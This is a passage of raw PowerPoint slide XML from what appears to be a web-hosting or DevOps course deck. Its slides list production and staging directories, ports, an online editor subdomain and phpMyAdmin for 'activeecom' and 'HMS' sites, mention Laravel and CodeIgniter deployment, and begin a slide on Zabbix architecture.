          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474800" y="879000"/>
            <a:ext cx="8302800" cy="41121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6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Production (Customer/Client)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	activeecom_production/index.html (8080)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Staging  (Developer)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>activeecom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_staging/index.html (8081)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Online Editor</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     https://editor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>activeecom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.vishalmahawar.shop (8082)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Phpmyadmin (8079)  pma</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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7" name="Shape 4857"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4858" name="Google Shape;4858;p789"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379275" y="324000"/>
            <a:ext cx="7913100" cy="70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Directory Structure for HMS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4859" name="Google Shape;4859;p789"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474800" y="879000"/>
            <a:ext cx="8302800" cy="41121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6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Production ENV (Customer/Client)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	hms_production/index.html (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Staging  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ENV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Developer)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hms_staging/index.html (6081)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Online Editor</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     https://editorhms.vishalmahawar.shop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>082)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Phpmyadmin (6079)  pma</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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3" name="Shape 4863"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4864" name="Google Shape;4864;p790"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719875" y="587025"/>
            <a:ext cx="8199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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://codecanyon.net/</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3500" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://doniaweb.com/</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3500"/>
              <a:t>Laravel Project    -&gt; /var/www/html</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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8" name="Shape 4868"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4869" name="Google Shape;4869;p791"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1385375"/>
            <a:ext cx="8520600" cy="1988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500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>staging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and Prod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for CodeIgniter Application</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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3" name="Shape 4873"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4874" name="Google Shape;4874;p792"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379275" y="324000"/>
            <a:ext cx="7913100" cy="70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Directory Structure for HMS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4875" name="Google Shape;4875;p792"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474800" y="879000"/>
            <a:ext cx="8302800" cy="41121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6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Production ENV (Customer/Client)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	hms_production/index.html (6080)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Staging   ENV (Developer)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hms_staging/index.html (6081)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Online Editor</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     https://editorhms.vishalmahawar.shop (6082)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Phpmyadmin (6079)  pma</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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9" name="Shape 4879"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4880" name="Google Shape;4880;p793"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="517325" y="1509425"/>
            <a:ext cx="8109350" cy="21246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101"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333300" y="502750"/>
            <a:ext cx="6345825" cy="3809150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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4" name="Shape 4884"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4885" name="Google Shape;4885;p79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420">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zabbix </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3420">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Architecture</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3420">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3420">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>consists</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3420">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
